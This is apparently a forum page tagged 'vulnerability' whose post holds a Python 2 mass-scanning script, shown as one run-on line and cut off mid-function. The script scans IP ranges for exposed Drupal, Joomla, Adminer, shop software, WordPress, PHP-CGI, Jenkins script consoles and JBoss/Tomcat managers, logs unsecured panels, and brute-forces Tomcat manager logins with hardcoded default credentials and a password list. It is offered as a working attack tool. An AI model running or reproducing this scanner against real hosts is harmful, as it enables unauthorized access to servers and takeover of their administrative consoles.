Showing results for tags 'vulnerability'.

Found 2 results

  1. #!/usr/bin/python #-*- coding:utf-8 -*- import inspect import re import urllib2 import threading import sys import ssl import requests class read_file_ip(): """ Read File line per line """ def __init__(self, file): try: self.file = open(file, "r+") except: print "[ERROR] Cant open File" self.actual_line = "" def next_line(self): """ Moves the pointer to the next line and returns this """ try: line = self.file.next().rstrip() except StopIteration: line = False except AttributeError: line = False self.actual_line = line return line def actual_line(self): """ Returns actual line, doesnt moves the pointer """ return self.actual_line class tools(): """ Here you can store all functions which you want to use a few times """ @staticmethod def logging(file, value): """ Log something to a file """ log_file = open(file, "a") log_file.write(value+"\r\n") log_file.close() @staticmethod def create_http_url(host, port, file = "/", prot = "http"): """ Create Url for Urllib2 """ return "%s://%s:%s%s" %(prot, host, port, file) @staticmethod def http_get(ip, port, file = "", timeout = None, url = None, ssl = False): """ GET HTTP Status Code, html and url from url or ip + file """ if url == None: if ssl == False: prot = "http" else: prot = "https" if port == None: port = 80 if file == None: raise("ERR: func_http_get: no url or file specified") url = "%s://%s:%s%s" %(prot, ip, port, file) if timeout == None: timeout = scan.conf_timeout try: conn = urllib2.urlopen(url, timeout = None) except urllib2.HTTPError as e: return [True, e.code, url, e.read()] except urllib2.URLError as e: return [False, None, None, None] except urllib2.socket.timeout as e: return [False, None, None, None] except requests.exceptions.SSLError as e: return e.message return [True, conn.code, url, conn.read()] @staticmethod def get_string_between(string, start, end): try: end_of_string = string.index(start) + len(start) start_of_string = string.index(end, end_of_string) return 
string[end_of_string:start_of_string] except: return False @staticmethod def get_http_headers(url, timeout = None): """ Get Http Headers and compare them to dictionary which will be returned """ main_url = url target_headers_dict = {} if timeout == None: timeout = scan.conf_timeout try: target_urllib = urllib2.urlopen(main_url, timeout = timeout) except urllib2.HTTPError as e: return {"Error" : e} except urllib2.URLError as e: return {"Error" : e} except urllib2.socket.timeout as e: return {"Error" : e} except: return {"Error" : "Unknown"} target_headers = target_urllib.info().headers for i in target_headers: i = i.strip() items = i.split(": ") try: target_headers_dict[items[0]] = items[1] except IndexError: print items #Heres some bug but to lazy to fix it ^^ Fixxed with try but no nice code... return target_headers_dict def check_if_any_from_arr_in_string(string, whitelist = None, blacklist = None): """ Check if any item from array is in string. Allows black and whitelist. """ if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] for i in blacklist: print i if any(k in string for k in whitelist) and any(k not in string for k in blacklist): return True else: return False def regex_not_match(string, regex): """ Returns True if regex does NOT match, false if it matches. Needed for check_if_any_reg_from_arr_in_string() """ if re.match(regex, string) == None: return True else: return False def check_if_any_reg_from_arr_in_string(string, whitelist = None, blacklist = None): """ Checks if any regex from array is in string. Allows black and whitelist. 
""" if whitelist == None and blacklist == None: return False elif whitelist == None: whitelist == [] elif blacklist == None: blacklist == [] if any(re.match(k, string) for k in whitelist) and any(regex_not_match(string, k) for k in blacklist): return True else: return False @staticmethod def http_basic_auth(theurl, username, password): passman = urllib2.HTTPPasswordMgrWithDefaultRealm() # this creates a password manager passman.add_password(None, theurl, username, password) # because we have put None at the start it will always # use this username/password combination for urls # for which `theurl` is a super-url authhandler = urllib2.HTTPBasicAuthHandler(passman) # create the AuthHandler opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) # All calls to urllib2.urlopen will now use our handler # Make sure not to include the protocol in with the URL, or # HTTPPasswordMgrWithDefaultRealm will be very confused. # You must (of course) use it when fetching the page though. try: pagehandle = urllib2.urlopen(theurl) except urllib2.HTTPError as e: return [False, e] # authentication is now handled automatically for us return [True, pagehandle.read()] class scan(): """ Class which does the Scanning Part. Here you can also add new scan modules. 
""" def __init__(self, timeout): self.mod_scan_list = [] self.func_scan_modules() self.conf_timeout = int(timeout) def check(self, ip, port): print "Scanning ",ip, port for mod in self.mod_scan_list: #print mod eval("self.module_scan_%s(\"%s\", %s)" %(mod, ip, port)) print "Finished ",ip, port def func_scan_modules(self): all_funcs = inspect.getmembers(self, inspect.ismethod) for func in all_funcs: func_name = eval("self.%s" %(func[0])) func_args = inspect.getargspec(func_name) func_real_name_split = func[0].split("_") #print func_args if func_real_name_split[0] == "module": if func_real_name_split[1] == "scan": self.mod_scan_list.append(func_real_name_split[2]) print "[Module] Scan: %s" %(func_real_name_split[2]) def module_scan_drupal1(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal1.txt", "log_unknwn_result_file" : "unknwn_results_drupal1.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: main_server_info = tools().get_http_headers(main_url+path) if main_server_info.get("Expires") == "Sun, 19 Nov 1978 05:00:00 GMT": 
tools().logging(__info__['log_result_file'], main_url+path+" Server:"+path+ " "+main_server_info.get("X-Generator")) def module_scan_drupal2(self, ip, port): ############################################################# # Scan for Drupal (all versions) and log them ############################################################# __info__ = {"name" : "drupal", "log_result_file" : "log_drupal2.txt", "log_unknwn_result_file" : "unknwn_results_drupal2.txt", "paths" : ["/Drupal", "/admin/build", "/blog", "/cms", "/community", "/content", "/core", "/developer", "/drupal", "/drupal/user/login?destination=admin", "/includes", "/logout", "/modules", "/page", "/shop", "/site", "/store", "/vendor", "/web", "/weblog", "/website", "/drupal/drupal6", "/drupal/drupal7", "/drupal/drupal8", "/modules/devel", "/sites/all/themes/adaptivetheme/at_admin", "/sites/all/modules/date/date_migrate/date_migrate_example", "/sites/all/modules/date", "/sites/all/modules/devel", "/sites/mysite/modules/contrib/views_bulk_operations", "/sites/mysite/modules/contrib/devel", "Cmsgarden\Cmsscanner\Detector\Module", "/modules/ctools"], "marks" : ["Drupal"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/user/login" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Drupal:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_joomla1(self, ip, port): ############################################################# # Scan Hosts for installed Joomla and log them 
############################################################# __info__ = {"name" : "joomla", "log_result_file" : "log_joomla1.txt", "log_unknwn_result_file" : "unknwn_results_joomla1.txt", "paths" : ["/joomla", "/cms", "/Joomla", "/administrator/help/en-GB/toc.json", "/administrator/language/en-GB/install.xml", "/plugins/system/debug/debug.xml", "/administrator/", "/joomla/joomla1.5", "/joomla/joomla2.5", "/joomla/joomla3.5"], "marks" : ["Joomla!", "http://www.joomla.org", "for=\"modlgn_username\">"], "marks_1.0x" : ["<meta name=\"generator\" content=\"Joomla! - Copyright (C) 2005 - 2007 Open Source Matters.\" />"], "marks_1.5x" : ["<meta name=\"generator\" content=\"Joomla! 1.5 - Open Source Content Management\" />"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/administrator" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: if any(k in target_return[3] for k in __info__['marks']): joomla_version = "UNKNOWN" if any(k in target_return[3] for k in __info__['marks_1.0x']): joomla_version = "1.0.x" if any(k in target_return[3] for k in __info__['marks_1.5x']): joomla_version = "1.5.x" result_line = "%s Version: %s Server: %s" %(main_url+path ,joomla_version, main_server_info['Server']) print "[*] JOOMLA:", target_url, "Version:", joomla_version tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_adminer(self, ip, port): ############################################################# #Scan for log_adminer_DB_LogIn by [email protected]@R-LightS ############################################################# __info__ = {"name" : "adminer", "log_result_file" : "log_adminer.txt", "log_unknwn_result_file" : 
"unknwn_results_adminer.txt", "paths" : ["/_adminer.php", "/ad.php", "/adminer/index.php", "/adminer1.php", "/mirasvit_adminer_431.php", "/mirasvit_adminer-4.2.3.php", "/latest.php", "/adminer-4.7.0.php", "/wp-content/uploads/adminer.php", "/wp-content/plugins/adminer/inc/editor/index.php", "/wp-content/adminer.php", "/adminer/adminer-4.7.0.php", "/upload/adminer.php", "/uploads/adminer.php", "/adminer/adminer.php", "/adminer/adminer.php", "/mysql-adminer.php", "/wp-admin/adminer.php", "/wp-admin/mysql-adminer.php", "/adminer/", "/adminer-4.2.5-en.php", "/adminer-4.2.5-mysql.php", "/adminer-4.2.5.php", "/adminer-4.3.0-en.php", "/adminer-4.3.0-mysql.php", "/adminer-4.3.0.php", "/adminer-4.3.1-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer-4.4.0-en.php", "/adminer-4.4.0-mysql.php", "/adminer-4.4.0.php", "/adminer-4.5.0-en.php", "/adminer-4.5.0-mysql.php", "/adminer-4.5.0.php", "/adminer-4.6.0-en.php", "/adminer-4.6.0-mysql.php", "/adminer-4.6.0.php", "/adminer-4.6.1-en.php", "/adminer-4.6.1-mysql.php", "/adminer-4.6.1.php", "/adminer-4.3.0-en.php", "/adminer-4.3.1-mysql.php", "/adminer-4.3.1.php", "/adminer.php"], "marks" : ["Adminer", "https://www.adminer.org/de/"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Adminer:", target_url tools().logging(__info__['log_result_file'], target_url) else: tools().logging(__info__['log_unknwn_result_file'], target_url) def module_scan_opencart(self, ip, port): ############################################################# # Scan Hosts for OpenCart 
and add. paths to exploits ! # by ##[email protected]## , [email protected]@R-LightS and L1ne:1337 THxxx ############################################################# __info__ = {"name" : "OpenCart", "log_result_file" : "log_opencart.txt", "log_unknwn_result_file" : "unknwn_results_opencart.txt", "paths" : ["/admin/common/login.php", "/opencart/upload", "/system/startup.php", "/admin/index.php", "/admin/config.php", "/install/index.php", "/catalog/controller/payment/authorizenet_aim.php", "/info.php", "/admin/controller/common/login.php", "/admin/controller/extension/payment.php"], "marks" : ["OpenCart", "https://www.opencart.com", "OpenCart 1", "Powered By OpenCart", "Shopping cart", "shop", "Vivid Ads Shopping Cart", "ShopMaker v1.0", "Powered by CS-Cart - Shopping Cart Software", "OpenCart 2", "OpenCart 3", "powered by OpenCart"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] OpenChart:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_prestashop(self, ip, port): ############################################################# # Scan Hosts for installed Prestashop and log them by [email protected]@R-LightS ############################################################# __info__ = {"name" : "Prestashop", "log_result_file" : "log_prestashop.txt", "log_unknwn_result_file" : "unknwn_results_prestashop.txt", "paths" : ["/store/admin", "/administrator", "/myshopadminpanel", "/adminfolder123", "/admin"], 
"marks" : ["prestashop", "Prestashop 1.1", "Prestashop 1.2", "Prestashop 1.3", "Prestashop 1.4", "Prestashop 1.5", "Prestashop 1.6", "Prestashop 1.7", "Prestashop 1.8", "www.prestashop.com()", "Powered by Prestashop"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] Prestashop:", target_url tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_wordpress(self, ip, port): ############################################################# # Scan Hosts for installed Wordpress and log them ############################################################# __info__ = {"name" : "wordpress", "log_result_file" : "log_wordpress.txt", "log_unknwn_result_file" : "unknwn_results_wordpress.txt", "paths" : ["/wordpress", "/wp", "/blog", "wp-login.php", "/wordpress/wp-login.php", "/Wordpress", "/Blog"], "marks" : ["wp-submit", "wp_attempt_focus()", "Powered by WordPress", "?action=lostpassword"],} main_url = tools().create_http_url(ip, port, file = "", prot = "http") main_server_info = tools().get_http_headers(main_url) #print main_url for path in __info__['paths']: target_url = main_url+path+"/wp-login.php" target_return = tools().http_get(None, None, url = target_url) #print target_return[3] if target_return[0] == False: print "Host down" break if target_return[1] == 200: result_line = "%s Server: %s" %(main_url+path, main_server_info['Server']) if any(k in target_return[3] for k in __info__['marks']): print "[*] WordPress:", target_url 
tools().logging(__info__['log_result_file'], result_line) else: tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_httpserver(self, ip, port): ############################################################# # Log HTTPServer Information such as used Serversoftware # and Version if possible and log them ############################################################# __info__ = {"name" : "httpserverinfo", "log_result_file" : "log_httpserver.txt"} target_url = tools().create_http_url(ip, port, file = "", prot = "http") headers = tools().get_http_headers(target_url) try: headers_server = headers['Server'] except KeyError, TypeError: headers_server = "Unknown" #print headers_server tools().logging(__info__['log_result_file'], target_url+" Server:"+headers_server) def module_scan_phpcgi(self, ip, port): ############################################################# # Scan Hosts for PHPCGI and log them ############################################################# __info__ = {"name" : "phpcgi", "log_usec_result_file" : "log_php_cgi.txt", "paths" : ["/cgi-bin/php", "/cgi-bin/php5"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: tools().logging(__info__['log_usec_result_file'], target_url) def module_scan_ejbinvoker(self, ip, port): ############################################################# update:29.01.21 # Scan Hosts for installed Jboss/Tomcat Servers Ports to scan: (8080,9111,9832) # having a EJBInvoker and log them ############################################################# __info__ = {"name" : "EJBInvokerServlet", "log_usec_result_file" : "usec_result_ejb.txt", "log_sec_result_file" : "sec_results_ejb.txt", "log_unknwn_result_file" : "unknwn_results_ejb.txt", "paths" : ["/status?full=true"], "marks" : 
["EJBInvokerServlet", "JMXInvokerServlet", "WWW-Authenticate: Basic realm=JBoss HTTP Invoker"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured # Check with k not in ... mark_fuzzed that the pma is not fucked up ;) if any(k in target_return[3] for k in __info__['marks']): print "[*] EJB (USEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) else: print "[*] EJB (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] EJB (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jenkins(self, ip, port): #############################################################update:29.01.21 # Scan Hosts for installed Jenkins Server and log them Ports to scan: (80,82,84,100,443,515,1024,2002,2086,2121,2555,3428,3749,4444,4506, # 4840,5000,5432,5801,5858,7070,7777,8000,8066,8080,8081,8082,8086,8044, # 8087,8443,8500,9000,9002,9090,9095,9200,9595,9999,13579,55553,55554,60001) ############################################################# __info__ = {"name" : "jenkins", "log_usec_result_file" : "usec_result_jenkins.txt", "log_create_result_file" : "create_results_jenkins.txt", "log_sec_result_file" : "sec_results_jenkins.txt", "log_unknwn_result_file" : "unknwn_results_jenkins.txt", "paths" : ["/asynchPeople/", "/computer/", "/hudson/login", "/hudson/script", "/jenkins/login", "/jenkins/script", "/login", "/pview/", "/scripts" "/script", "/securityRealm/createAccount", "/signup", "/systemInfo", "/systeminf", "/manage" "/userContent/", "/view/All/builds", "/view/All/newjob"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url 
for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 200: #Might be unsecured if target_return[3].find("println(Jenkins.instance.pluginManager.plugins)") != -1: print "[*] Jenkins (UNSEC):",target_url tools().logging(__info__['log_usec_result_file'], target_url) print target_return[3] elif target_return[3].find("\">Create an account</a> if you are not a member yet.</div></div></td></tr>") != -1: #might create account print "[*] Jenkins (CREATE):",target_url tools().logging(__info__['log_create_result_file'], target_url) print target_return[3] elif target_return[3].find("<title>Jenkins</title>") != -1: print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) print target_return[3] else: tools().logging(__info__['log_unknwn_result_file'], target_url) elif target_return[1] == 203: #Might be protected with htaccess print "[*] Jenkins (SEC):",target_url tools().logging(__info__['log_sec_result_file'], target_url) def module_scan_jmx1(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for standard accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx1_secured.txt", "log_usec_result_file" : "log_jmx1_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx1.txt", "log_bruted_result_file" : "log_jmx1_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", 
"/examples", "/examples/jsp/index.html", "/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", 
"/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in __info__['paths']: target_url = main_url+path target_return = tools().http_get(None, None, url = target_url) #print target_return[1] if target_return[0] == False: print "Host down" break if target_return[1] == 404: continue #Skip 404 Things target_server_info = tools().get_http_headers(main_url) headers = tools().get_http_headers(main_url) try: headers_server = headers['Server'] except KeyError: headers_server = "Unknown" result_line = "%s Server: %s" %(target_url, headers_server) if target_return[1] == 200 or target_return[1] == 401: #Might be unsecured if any(k in target_return[3] for k in __info__['mark_sec']): if tools().http_basic_auth(target_url, "tomcat", "tomcat")[0] == True: result_line += " Account: tomcat / tomcat" print "[*] JMX 
(BRUTED):",target_url, "Login: tomcat:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "t0mcat")[0] == True: result_line += " Account: tomcat / t0mcat" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:t0mcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "tomcat", "admin")[0] == True: result_line += " Account: tomcat / admin" print "[*] JMX (BRUTED):",target_url, "Login: tomcat:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "tomcat")[0] == True: result_line += " Account: admin / tomcat" print "[*] JMX (BRUTED):",target_url, "Login: admin:tomcat" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "admin")[0] == True: result_line += " Account: admin / admin" print "[*] JMX (BRUTED):",target_url, "Login: admin:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "manager")[0] == True: result_line += " Account: admin / manager" print "[*] JMX (BRUTED):",target_url, "Login: admin:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "manager")[0] == True: result_line += " Account: manager / manager" print "[*] JMX (BRUTED):",target_url, "Login: manager:manager" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "manager", "admin")[0] == True: result_line += " Account: manager / admin" print "[*] JMX (BRUTED):",target_url, "Login: manager:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "admin", "root")[0] == True: result_line += " Account: admin / root" print "[*] JMX (BRUTED):",target_url, "Login: admin:root" 
tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "admin")[0] == True: result_line += " Account: root / admin" print "[*] JMX (BRUTED):",target_url, "Login: root:admin" tools().logging(__info__['log_bruted_result_file'], result_line) elif tools().http_basic_auth(target_url, "root", "root")[0] == True: result_line += " Account: root / root" print "[*] JMX (BRUTED):",target_url, "Login: root:root" tools().logging(__info__['log_bruted_result_file'], result_line) else: print "[*] JMX (SEC):",target_url tools().logging(__info__['log_sec_result_file'], result_line) elif any(k in target_return[3] for k in __info__['mark_usec']): print "[*] JMX (USEC):",target_url tools().logging(__info__['log_usec_result_file'], result_line) else: print "[*] JMX (UKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) elif target_return[1] != 404: #Needs Login but can be bruted print "[*] JMX (UNKNWN):",target_url tools().logging(__info__['log_unknwn_result_file'], result_line) def module_scan_jmx2(self, ip, port): ############################################################# # Scan for Jboss/Tomcat servers having a admin panel and update:29.01.21 # brute for accounts and log them Ports to scan: (8081,8080,8090,8443,3541,8086,9080,) # Brute modded by moep ############################################################# __info__ = {"name" : "jmx", "log_sec_result_file" : "log_jmx2_secured.txt", "log_usec_result_file" : "log_jmx2_unsecured.txt", "log_unknwn_result_file" : "unknwn_results_jmx2.txt", "log_bruted_result_file" : "log_jmx2_bruted.txt", "paths" : ["/jmx-console", "/admin-console/", "/EJBInvokerServlet", "/web-console/AOPBinding.jsp", "/web-console/Invoker", "/jadmin-console/", "/web-console/status", "/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo" "/admin-console/", "/ROOT", "/add", "/balancer", "/dav", "/deploy", "/examples", "/examples/jsp/index.html", 
"/examples/jsp/snp/snoop.jsp", "/examples/jsp/source.jsp", "/examples/servlet/HelloWorldExample", "/examples/servlet/SnoopServlet", "/examples/servlet/TroubleShooter", "/examples/servlet/default/jsp/snp/snoop.jsp", "/examples/servlet/default/jsp/source.jsp", "/examples/servlet/org.apache.catalina.INVOKER.HelloWorldExample", "/examples/servlet/org.apache.catalina.INVOKER.SnoopServlet", "/examples/servlet/org.apache.catalina.INVOKER.TroubleShooter", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.DefaultServlet/jsp/source.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/snp/snoop.jsp", "/examples/servlet/org.apache.catalina.servlets.WebdavServlet/jsp/source.jsp", "/examples/servlet/snoop", "/examples/servlets/index.html", "/examples/../manager/html", "/examples/%2e%2e/manager/html", "/examples/%252e%252e/manager/html", "/host-manager", "/host-manager/add", "/host-manager/host-manager.xml", "/host-manager/html/*", "/host-manager/list", "/host-manager/remove", "/host-manager/start", "/host-manager/stop", "/html/*", "/install", "/j4p", "/jmxproxy/*", "/jsp-examples", "/manager/list", "/manager/manager.xml", "/manager/reload", "/manager/remove", "/manager/resources", "/manager/roles", "/manager/save", "/manager/serverinfo", "/manager/sessions", "/manager/start", "/manager/status.xsd", "/manager/status/*", "/manager/stop", "/manager/undeploy", "/reload", "/remove", "/resources", "/roles", "/save", "/serverinfo", "/servlet/default/", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.INVOKER.org.apache.catalina.servlets.WebdavServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/", "/servlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", 
"/servlet/org.apache.catalina.servlets.HTMLManagerServlet", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.DefaultServlet/tomcat.gif", "/servlet/org.apache.catalina.servlets.InvokerServlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.ManagerServlet", "/servlet/org.apache.catalina.servlets.SnoopAllServlet", "/servlet/org.apache.catalina.servlets.WebdavServlet/", "/servlets-examples", "/sessions", "/start", "/status/*", "/stop", "/tomcat-docs", "/undeploy", "/webdav", "/webdav/index.html", "/webdav/servlet/org.apache.catalina.servlets.WebdavServlet/", "/webdav/servlet/webdav/", "/invoker/JMXInvokerServlet" "/web-console/ServerInfo.jsp" "/invoker/", "/JMXInvokerServlet", "/jbossmq-httpil/", "/jbossws/services", "/jmx-console/HtmlAdaptor", "/web-console", "/manager/html", "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo"], "mark_sec" : ["main Manager page", "&lt;role rolename=\"manager-gui\"/&gt;", "Manager App HOW-TO"], "mark_usec" : ["JBoss JMX Management Console", "x-powered-by jboss", "jboss http.favicon.hash:-656811182"]} tadmins = ['admin', 'both', 'manager', 'role', 'role1' 'root', 'tomcat', 't0mcat'] tpasswords = ['', '102030', '112233', '123', '123123', '1234', '12345', '123456', '1234567', '12345678', '123456789', '1234567890', '1q2w3e4r', '321321', '654321', '666666', 'Password', 'Password1', 'Password12', 'Password123', 'abc123', 'access', 'admin', 'admin01','admin123', 'admin1234', 'admin123456', '[email protected]', 'adminadmin', 'blah', 'both', 'changethis', 'demo', 'demo123', 'hello', 'manager', 'pass', 'pass123', 'pass1234', 'passw0rd', 'password', 'password1', 'password12', 'password123', 'qwert', 'qwerty', 'qwertz', 'qwerty123', 'role', 'root', 's3cret', 'secret', 't0mcat', 'test', 'tomcat', 'toor', 'welcome', 'xmagico', 'zx321654xz'] main_url = tools().create_http_url(ip, port, file = "", prot = "http") #print main_url for path in 
